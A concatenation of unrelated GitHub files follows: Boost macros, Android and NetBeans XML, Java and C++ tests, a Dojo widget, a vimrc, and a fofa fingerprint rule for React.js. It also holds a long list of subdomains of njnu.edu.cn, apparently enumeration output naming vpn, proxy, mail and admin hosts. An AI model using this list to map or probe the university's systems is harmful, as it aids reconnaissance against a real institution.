# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_151(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_152(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_153(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_154(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_155(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_156(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_157(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_158(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_159(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_160(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_161(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_162(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_163(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_164(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_165(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_166(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_167(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_168(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_169(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_170(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_171(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_172(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_173(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_174(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_175(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_176(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_177(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_178(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_179(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_180(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_181(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_182(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_183(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_184(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_185(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_186(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_187(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_188(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_189(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_190(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_191(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_192(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_193(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_194(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_195(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_196(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_197(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_198(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_199(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_200(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_201(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_202(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_203(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_204(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_205(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_206(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_207(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_208(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_209(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_210(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_211(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_212(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_213(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_214(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_215(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_216(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_217(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_218(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_219(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_220(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_221(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_222(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_223(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_224(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_225(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_226(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_227(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_228(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_229(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_230(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_231(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_232(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_233(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_234(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_235(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_236(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_237(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_238(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_239(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_240(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_241(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_242(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_243(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_244(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_245(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_246(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_247(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_248(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_249(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_250(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_251(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_252(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_253(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_254(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_255(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_256(p, o, s) 0
#
# endif
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<adaptive-icon xmlns:android="http://schemas.android.com/apk/res/android">
<background android:drawable="@android:color/white"/>
<foreground android:drawable="@mipmap/ic_launcher_foreground"/>
</adaptive-icon> | {
"pile_set_name": "Github"
} |
/*
* Copyright 2000-2014 JetBrains s.r.o.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package pkg;
public class TestConstants {
static final boolean T = true;
static final boolean F = false;
static final char C0 = '\n';
static final char C1 = 'a';
static final char C2 = 512;
static final byte BMin = Byte.MIN_VALUE;
static final byte BMax = Byte.MAX_VALUE;
static final short SMin = Short.MIN_VALUE;
static final short SMax = Short.MAX_VALUE;
static final int IMin = Integer.MIN_VALUE;
static final int IMax = Integer.MAX_VALUE;
static final long LMin = Long.MIN_VALUE;
static final long LMax = Long.MAX_VALUE;
static final float FNan = Float.NaN;
static final float FNeg = Float.NEGATIVE_INFINITY;
static final float FPos = Float.POSITIVE_INFINITY;
static final float FMin = Float.MIN_VALUE;
static final float FMax = Float.MAX_VALUE;
static final double DNan = Double.NaN;
static final double DNeg = Double.NEGATIVE_INFINITY;
static final double DPos = Double.POSITIVE_INFINITY;
static final double DMin = Double.MIN_VALUE;
static final double DMax = Double.MAX_VALUE;
static @interface A {
Class<?> value();
}
@A(byte.class) void m1() { }
@A(char.class) void m2() { }
@A(double.class) void m3() { }
@A(float.class) void m4() { }
@A(int.class) void m5() { }
@A(long.class) void m6() { }
@A(short.class) void m7() { }
@A(boolean.class) void m8() { }
@A(void.class) void m9() { }
@A(java.util.Date.class) void m10() { }
} | {
"pile_set_name": "Github"
} |
{
"name": "React.js",
"author": "fofa",
"version": "0.1.0",
"matches": [
{
"search": "body",
"text": "/react.js"
},
{
"search": "body",
"text": "React.createClass"
}
]
} | {
"pile_set_name": "Github"
} |
package com.story.storyadmin.mapper.sysmgr;
import com.baomidou.mybatisplus.annotation.SqlParser;
import com.baomidou.mybatisplus.core.conditions.query.QueryWrapper;
import com.baomidou.mybatisplus.core.mapper.BaseMapper;
import com.baomidou.mybatisplus.core.toolkit.Constants;
import com.story.storyadmin.domain.entity.sysmgr.User;
import com.story.storyadmin.domain.entity.sysmgr.UserRole;
import org.apache.ibatis.annotations.Param;
import org.apache.ibatis.annotations.Select;
import java.util.List;
/**
* <p>
* 用户表 Mapper 接口
* </p>
*
* @author sunnj
* @since 2018-12-28
*/
public interface UserMapper extends BaseMapper<User> {
/**
* 查询根据账号查询用户,忽略租户过滤
* @return
*/
@SqlParser(filter=true)
@Select("SELECT id,account,name,password,status,erp_flag FROM st_user ${ew.customSqlSegment}")
List<User> findUserByAccount(@Param(Constants.WRAPPER) QueryWrapper<User> wrapper);
}
| {
"pile_set_name": "Github"
} |
package com.consol.citrus;
/**
* @author Christoph Deppisch
*/
public interface TestCaseRunner extends TestCaseBuilder, GherkinTestActionRunner {
/**
* Starts the test case execution.
*/
void start();
/**
* Stops test case execution.
*/
void stop();
}
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8" ?>
<!--
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
-->
<Form version="1.5" maxVersion="1.8" type="org.netbeans.modules.form.forminfo.JPanelFormInfo">
<AuxValues>
<AuxValue name="FormSettings_autoResourcing" type="java.lang.Integer" value="1"/>
<AuxValue name="FormSettings_autoSetComponentName" type="java.lang.Boolean" value="false"/>
<AuxValue name="FormSettings_generateFQN" type="java.lang.Boolean" value="true"/>
<AuxValue name="FormSettings_generateMnemonicsCode" type="java.lang.Boolean" value="true"/>
<AuxValue name="FormSettings_i18nAutoMode" type="java.lang.Boolean" value="true"/>
<AuxValue name="FormSettings_layoutCodeTarget" type="java.lang.Integer" value="1"/>
<AuxValue name="FormSettings_listenerGenerationStyle" type="java.lang.Integer" value="0"/>
<AuxValue name="FormSettings_variablesLocal" type="java.lang.Boolean" value="false"/>
<AuxValue name="FormSettings_variablesModifier" type="java.lang.Integer" value="2"/>
</AuxValues>
<Layout>
<DimensionLayout dim="0">
<Group type="103" groupAlignment="0" attributes="0">
<Group type="102" alignment="1" attributes="0">
<EmptySpace max="-2" attributes="0"/>
<Group type="103" groupAlignment="1" attributes="0">
<Component id="customPanelContainer" max="32767" attributes="0"/>
<Component id="commonPanelContainer" alignment="0" max="32767" attributes="0"/>
<Group type="102" alignment="0" attributes="0">
<Component id="lLanguage" min="-2" max="-2" attributes="0"/>
<EmptySpace min="-2" pref="3" max="-2" attributes="0"/>
<Component id="cboLanguage" min="-2" max="-2" attributes="0"/>
<EmptySpace min="0" pref="0" max="32767" attributes="0"/>
</Group>
</Group>
<EmptySpace max="-2" attributes="0"/>
</Group>
</Group>
</DimensionLayout>
<DimensionLayout dim="1">
<Group type="103" groupAlignment="0" attributes="0">
<Group type="102" alignment="0" attributes="0">
<EmptySpace max="-2" attributes="0"/>
<Group type="103" groupAlignment="3" attributes="0">
<Component id="lLanguage" alignment="3" min="-2" max="-2" attributes="0"/>
<Component id="cboLanguage" alignment="3" min="-2" max="-2" attributes="0"/>
</Group>
<EmptySpace type="unrelated" max="-2" attributes="0"/>
<Component id="commonPanelContainer" min="-2" max="-2" attributes="0"/>
<EmptySpace type="unrelated" max="-2" attributes="0"/>
<Component id="customPanelContainer" max="32767" attributes="0"/>
<EmptySpace max="-2" attributes="0"/>
</Group>
</Group>
</DimensionLayout>
</Layout>
<SubComponents>
<Component class="javax.swing.JLabel" name="lLanguage">
<Properties>
<Property name="labelFor" type="java.awt.Component" editor="org.netbeans.modules.form.ComponentChooserEditor">
<ComponentRef name="cboLanguage"/>
</Property>
<Property name="text" type="java.lang.String" editor="org.netbeans.modules.i18n.form.FormI18nStringEditor">
<ResourceString bundle="org/netbeans/modules/options/editor/onsave/Bundle.properties" key="OnSaveTabPanel.lLanguage.text" replaceFormat="org.openide.util.NbBundle.getMessage({sourceFileName}.class, "{key}")"/>
</Property>
</Properties>
</Component>
<Component class="javax.swing.JComboBox" name="cboLanguage">
<Properties>
<Property name="model" type="javax.swing.ComboBoxModel" editor="org.netbeans.modules.form.editors2.ComboBoxModelEditor">
<StringArray count="0"/>
</Property>
</Properties>
<Events>
<EventHandler event="actionPerformed" listener="java.awt.event.ActionListener" parameters="java.awt.event.ActionEvent" handler="languageChanged"/>
</Events>
</Component>
<Container class="javax.swing.JPanel" name="commonPanelContainer">
<Layout>
<DimensionLayout dim="0">
<Group type="103" groupAlignment="0" attributes="0">
<EmptySpace min="0" pref="241" max="32767" attributes="0"/>
</Group>
</DimensionLayout>
<DimensionLayout dim="1">
<Group type="103" groupAlignment="0" attributes="0">
<EmptySpace min="0" pref="90" max="32767" attributes="0"/>
</Group>
</DimensionLayout>
</Layout>
</Container>
<Container class="javax.swing.JPanel" name="customPanelContainer">
<Layout>
<DimensionLayout dim="0">
<Group type="103" groupAlignment="0" attributes="0">
<EmptySpace min="0" pref="0" max="32767" attributes="0"/>
</Group>
</DimensionLayout>
<DimensionLayout dim="1">
<Group type="103" groupAlignment="0" attributes="0">
<EmptySpace min="0" pref="137" max="32767" attributes="0"/>
</Group>
</DimensionLayout>
</Layout>
</Container>
</SubComponents>
</Form>
| {
"pile_set_name": "Github"
} |
// { dg-do run }
extern "C" void abort (void);
template <typename T>
void
foo ()
{
extern T x;
T v, l = 2, s = 1;
#pragma omp atomic seq_cst
x = -3 + x;
#pragma omp atomic read seq_cst
v = x;
if (v != 3)
abort ();
#pragma omp atomic seq_cst update
x = 3 * 2 * 1 + x;
#pragma omp atomic read, seq_cst
v = x;
if (v != 9)
abort ();
#pragma omp atomic seq_cst, capture
v = x = x | 16;
if (v != 25)
abort ();
#pragma omp atomic capture seq_cst
v = x = x + 14 * 2 / 4;
if (v != 32)
abort ();
#pragma omp atomic seq_cst capture
v = x = 5 | x;
if (v != 37)
abort ();
#pragma omp atomic capture, seq_cst
v = x = 40 + 12 - 2 - 7 - x;
if (v != 6)
abort ();
#pragma omp atomic seq_cst read
v = x;
if (v != 6)
abort ();
#pragma omp atomic capture seq_cst
{ v = x; x = 3 + x; }
if (v != 6)
abort ();
#pragma omp atomic seq_cst capture
{ v = x; x = -1 * -1 * -1 * -1 - x; }
if (v != 9)
abort ();
#pragma omp atomic read seq_cst
v = x;
if (v != -8)
abort ();
#pragma omp atomic capture, seq_cst
{ x = 2 * 2 - x; v = x; }
if (v != 12)
abort ();
#pragma omp atomic seq_cst capture
{ x = 7 & x; v = x; }
if (v != 4)
abort ();
#pragma omp atomic capture seq_cst
{ v = x; x = 6; }
if (v != 4)
abort ();
#pragma omp atomic read, seq_cst
v = x;
if (v != 6)
abort ();
#pragma omp atomic capture seq_cst
{ v = x; x = 7 * 8 + 23; }
if (v != 6)
abort ();
#pragma omp atomic seq_cst, read
v = x;
if (v != 79)
abort ();
#pragma omp atomic capture , seq_cst
{ v = x; x = 23 + 6 * 4; }
if (v != 79)
abort ();
#pragma omp atomic read seq_cst
v = x;
if (v != 47)
abort ();
#pragma omp atomic seq_cst capture
{ v = x; x = l ? 17 : 12; }
if (v != 47)
abort ();
#pragma omp atomic capture seq_cst
{ v = x; x = l = s++ + 3; }
if (v != 17 || l != 4 || s != 2)
abort ();
#pragma omp atomic read seq_cst
v = x;
if (v != 4)
abort ();
}
int x = 6;
int
main ()
{
foo <int> ();
return 0;
}
| {
"pile_set_name": "Github"
} |
import { DNode } from '../../../../src/core/interfaces';
import { WidgetBase } from '../../../../src/core/WidgetBase';
import { v, w } from '../../../../src/core/vdom';
import { Button } from './Button';
export interface ButtonConfig {
id: string;
label: string;
onClick: () => void;
}
export interface ButtonsProperties {
buttonConfigs: ButtonConfig[];
}
export class Buttons extends WidgetBase<ButtonsProperties> {
protected render(): DNode {
const { buttonConfigs } = this.properties;
return v('div', { classes: ['jumbotron'] }, [
v('div', { classes: ['row'] }, [
v('div', { classes: ['col-md-6'] }, [v('h1', ['Dojo2 v0.2.0'])]),
v(
'div',
{ classes: ['col-md-6'] },
buttonConfigs.map(({ id, label, onClick }) => {
return w(Button, { key: id, id, label, onClick });
})
)
])
]);
}
}
| {
"pile_set_name": "Github"
} |
jwc.njnu.edu.cn
bwc.njnu.edu.cn
k5a0c.njnu.edu.cn
wxy.njnu.edu.cn
waiyadmin.njnu.edu.cn
yjs.njnu.edu.cn
jgzfjs.njnu.edu.cn
ysjyzx.njnu.edu.cn
zcc.njnu.edu.cn
jwcl.njnu.edu.cn
zcjygs.njnu.edu.cn
gc.njnu.edu.cn
xhzyz.njnu.edu.cn
music.njnu.edu.cn
geomodeling.njnu.edu.cn
hgdq.njnu.edu.cn
physics.njnu.edu.cn
bkzs.njnu.edu.cn
qhy.njnu.edu.cn
xuebao.njnu.edu.cn
hi.njnu.edu.cn
hxlib.njnu.edu.cn
tky.njnu.edu.cn
0101.njnu.edu.cn
www.kc.njnu.edu.cn
wwwgrad.njnu.edu.cn
idc.njnu.edu.cn
jcfw.njnu.edu.cn
linkage.njnu.edu.cn
www.gr.njnu.edu.cn
mlclab.njnu.edu.cn
rsc.njnu.edu.cn
jxjy.njnu.edu.cn
sydj.njnu.edu.cn
clpen.njnu.edu.cn
fytz.njnu.edu.cn
math.njnu.edu.cn
gra.njnu.edu.cn
xngpd.njnu.edu.cn
qfz.njnu.edu.cn
www.www.computer.njnu.edu.cn
ggglxy.njnu.edu.cn
tzb.njnu.edu.cn
hyywz.njnu.edu.cn
mpa.njnu.edu.cn
zhzyz.njnu.edu.cn
xzb.njnu.edu.cn
urp.njnu.edu.cn
email.njnu.edu.cn
oa.njnu.edu.cn
dky.njnu.edu.cn
paxy.njnu.edu.cn
xyzx.njnu.edu.cn
ttc.njnu.edu.cn
proxy.njnu.edu.cn
xkjs.njnu.edu.cn
www.kingsoft.njnu.edu.cn
zbzs.njnu.edu.cn
kc.njnu.edu.cn
sjjx.njnu.edu.cn
jyshx.njnu.edu.cn
yt.njnu.edu.cn
cc.njnu.edu.cn
xyy.njnu.edu.cn
jyxl.njnu.edu.cn
120.njnu.edu.cn
yx.njnu.edu.cn
ent.qq.com.njnu.edu.cn
opac.njnu.edu.cn
pg.njnu.edu.cn
hmbooks.njnu.edu.cn
law.njnu.edu.cn
zxks.njnu.edu.cn
zr.njnu.edu.cn
wpad.njnu.edu.cn
xgb.njnu.edu.cn
moring.njnu.edu.cn
yjsrep.njnu.edu.cn
spanb.njnu.edu.cn
sxy.njnu.edu.cn
dlc.njnu.edu.cn
zbjw.njnu.edu.cn
jscx.njnu.edu.cn
3434.njnu.edu.cn
httpzbzs.njnu.edu.cn
bzzx.njnu.edu.cn
wap.njnu.edu.cn
liboa.njnu.edu.cn
spece.njnu.edu.cn
www.jxw.njnu.edu.cn
gbgl.njnu.edu.cn
ha.njnu.edu.cn
fx.njnu.edu.cn
ginling.njnu.edu.cn
dag.njnu.edu.cn
app.njnu.edu.cn
xxgkold.njnu.edu.cn
shjs.njnu.edu.cn
nsdgh.njnu.edu.cn
jsjyyjs.njnu.edu.cn
jxw.njnu.edu.cn
jwl.njnu.edu.cn
honors.njnu.edu.cn
w.njnu.edu.cn
www.y.njnu.edu.cn
jx.njnu.edu.cn
computer.njnu.edu.cn
clp.njnu.edu.cn
lab.njnu.edu.cn
www.tt.njnu.edu.cn
fdyjd.njnu.edu.cn
bb.njnu.edu.cn
fxy.njnu.edu.cn
j.njnu.edu.cn
marx.njnu.edu.cn
mathyz.njnu.edu.cn
libs.njnu.edu.cn
fz.njnu.edu.cn
software.njnu.edu.cn
my.njnu.edu.cn
account.njnu.edu.cn
sjc.njnu.edu.cn
wws.njnu.edu.cn
ltx.njnu.edu.cn
ma.njnu.edu.cn
welcome.njnu.edu.cn
morning.njnu.edu.cn
hpc.njnu.edu.cn
energy.njnu.edu.cn
yz.njnu.edu.cn
d.njnu.edu.cn
www.math.njnu.edu.cn
jsegciac.njnu.edu.cn
dy.njnu.edu.cn
jsjyxy.njnu.edu.cn
zb.njnu.edu.cn
det.njnu.edu.cn
css.njnu.edu.cn
newyjs.njnu.edu.cn
ecost.njnu.edu.cn
www.grd.njnu.edu.cn
add.njnu.edu.cn
spa.njnu.edu.cn
lib.njnu.edu.cn
cwc.njnu.edu.cn
msxy.njnu.edu.cn
tv.njnu.edu.cn
ggy.njnu.edu.cn
xxgk.njnu.edu.cn
zrt.njnu.edu.cn
www.njnu.edu.cn
ysxk.njnu.edu.cn
jly.njnu.edu.cn
xlxy.njnu.edu.cn
jny.njnu.edu.cn
bsh.njnu.edu.cn
shgs.njnu.edu.cn
xzeu.njnu.edu.cn
lxsgl.njnu.edu.cn
wyadmin.njnu.edu.cn
hetc.njnu.edu.cn
hqglc.njnu.edu.cn
hky.njnu.edu.cn
elearning.njnu.edu.cn
chem.njnu.edu.cn
sky.njnu.edu.cn
tt.njnu.edu.cn
jgdw.njnu.edu.cn
e.njnu.edu.cn
hpjh.njnu.edu.cn
xy.njnu.edu.cn
wy.njnu.edu.cn
sh.njnu.edu.cn
www.jwc.njnu.edu.cn
wyold.njnu.edu.cn
n.njnu.edu.cn
jsdp.njnu.edu.cn
fgc.njnu.edu.cn
dwb.njnu.edu.cn
eol.njnu.edu.cn
ww.njnu.edu.cn
www2.njnu.edu.cn
dyw.njnu.edu.cn
jw.njnu.edu.cn
afnanjing.njnu.edu.cn
spzx.njnu.edu.cn
mail.njnu.edu.cn
sfy.njnu.edu.cn
cx.njnu.edu.cn
geo.njnu.edu.cn
kjc.njnu.edu.cn
ecard.njnu.edu.cn
3g.zxks.njnu.edu.cn
xgc.njnu.edu.cn
orchid.njnu.edu.cn
211gl.njnu.edu.cn
press.njnu.edu.cn
geoladder.njnu.edu.cn
www.0101.njnu.edu.cn
shky.njnu.edu.cn
bamboo.njnu.edu.cn
ccer.njnu.edu.cn
cw.njnu.edu.cn
xinchuan.njnu.edu.cn
net.njnu.edu.cn
newoa.njnu.edu.cn
jwx.njnu.edu.cn
www.bb.njnu.edu.cn
211.njnu.edu.cn
sun.njnu.edu.cn
jsw.njnu.edu.cn
grad.njnu.edu.cn
psych2013.njnu.edu.cn
jwjl.njnu.edu.cn
xg.njnu.edu.cn
gkzp.njnu.edu.cn
ghjjc.njnu.edu.cn
jsjy.njnu.edu.cn
njnu.edu.cn
job.njnu.edu.cn
wwww.njnu.edu.cn
proxylib.njnu.edu.cn
vgekl.njnu.edu.cn
cwcx.njnu.edu.cn
metc.njnu.edu.cn
jysx.njnu.edu.cn
7dd.njnu.edu.cn
dlib.njnu.edu.cn
105.njnu.edu.cn
xgks.njnu.edu.cn
jwgl.njnu.edu.cn
pay.njnu.edu.cn
sxystu.njnu.edu.cn
zzb.njnu.edu.cn
pop3.njnu.edu.cn
zgzj.njnu.edu.cn
kcyjx.njnu.edu.cn
jky.njnu.edu.cn
bbs.njnu.edu.cn
js2011gis.njnu.edu.cn
gpjh.njnu.edu.cn
mba.njnu.edu.cn
ece.njnu.edu.cn
wd.njnu.edu.cn
yzadmin.njnu.edu.cn
mail1.njnu.edu.cn
gjc.njnu.edu.cn
gym.njnu.edu.cn
0708.njnu.edu.cn
lx.njnu.edu.cn
zzc.njnu.edu.cn
by.njnu.edu.cn
vpn.njnu.edu.cn
skc.njnu.edu.cn
gfs.njnu.edu.cn
xleu.njnu.edu.cn
zbvip.njnu.edu.cn
nnuaa.njnu.edu.cn
jsjx.njnu.edu.cn
1010.njnu.edu.cn
www.gra.njnu.edu.cn
| {
"pile_set_name": "Github"
} |
"===============================================================================
"
" File: customization.gvimrc
"
" Description: suggestion for a personal configuration file ~/.vimrc
"
" VIM Version: 7.0+
" Author: Wolfgang Mehner, [email protected]
" Dr. Fritz Mehner (fgm), [email protected]
" Revision: 16.04.2019
" License: Copyright (c) 2009-2018, Dr. Fritz Mehner
" Copyright (c) 2019, Wolfgang Mehner
"===============================================================================
"===============================================================================
" GENERAL SETTINGS
"===============================================================================
set cmdheight=2 " Make command line two lines high
set mousehide " Hide the mouse when typing text
highlight Normal guibg=grey90
highlight Cursor guibg=Blue guifg=NONE
highlight lCursor guibg=Cyan guifg=NONE
highlight NonText guibg=grey80
highlight Constant gui=NONE guibg=grey95
highlight Special gui=NONE guibg=grey95
let c_comment_strings=1 " highlight strings inside C comments
"-------------------------------------------------------------------------------
" Moving cursor to other windows
"
" shift-down : change window focus to lower one (cyclic)
" shift-up : change window focus to upper one (cyclic)
" shift-left : change window focus to one on left
" shift-right : change window focus to one on right
"-------------------------------------------------------------------------------
nnoremap <s-down> <c-w>w
nnoremap <s-up> <c-w>W
nnoremap <s-left> <c-w>h
nnoremap <s-right> <c-w>l
"-------------------------------------------------------------------------------
" Some additional hot keys
"
" shift-F3 : call gvim file browser
"-------------------------------------------------------------------------------
noremap <silent> <s-F3> :silent browse confirm e<CR>
inoremap <silent> <s-F3> <Esc>:silent browse confirm e<CR>
"-------------------------------------------------------------------------------
" toggle insert mode <--> normal mode with the <RightMouse>-key
"-------------------------------------------------------------------------------
nnoremap <RightMouse> <Insert>
inoremap <RightMouse> <ESC>
"-------------------------------------------------------------------------------
" use font with clearly distinguishable brackets: ()[]{}
"-------------------------------------------------------------------------------
"set guifont=Luxi\ Mono\ 14
| {
"pile_set_name": "Github"
} |
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
